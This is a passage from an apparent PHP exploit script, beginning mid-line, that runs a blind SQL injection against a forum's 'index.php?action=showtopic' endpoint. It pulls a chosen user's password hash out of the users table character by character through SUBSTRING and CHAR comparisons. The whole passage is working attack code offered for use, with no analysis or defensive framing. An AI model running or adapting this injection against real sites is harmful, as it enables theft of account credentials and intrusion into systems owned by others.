\n\n", $argv[0]); exit; } list(, $target, $login) = $argv; echo "[~] Target username set to $login\n"; $login = concat($login); $chars = array_merge((array)$chars, range(48, 57), range(97, 102)); $pos = 1; echo "[~] Password Hash : "; while($pos != 33) { for($i = 0; $i <= 16; $i++) { $query = "/index.php?action=showtopic&id=1+AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username=$login),$pos,1)=CHAR({$chars[$i]})--"; if(!preg_match('#Error#', file_get_contents($target . $query), $resp)) { printf("%s", chr($chars[$i])); $pos++; break; } } } echo "\n[~] Done\n\n"; ?>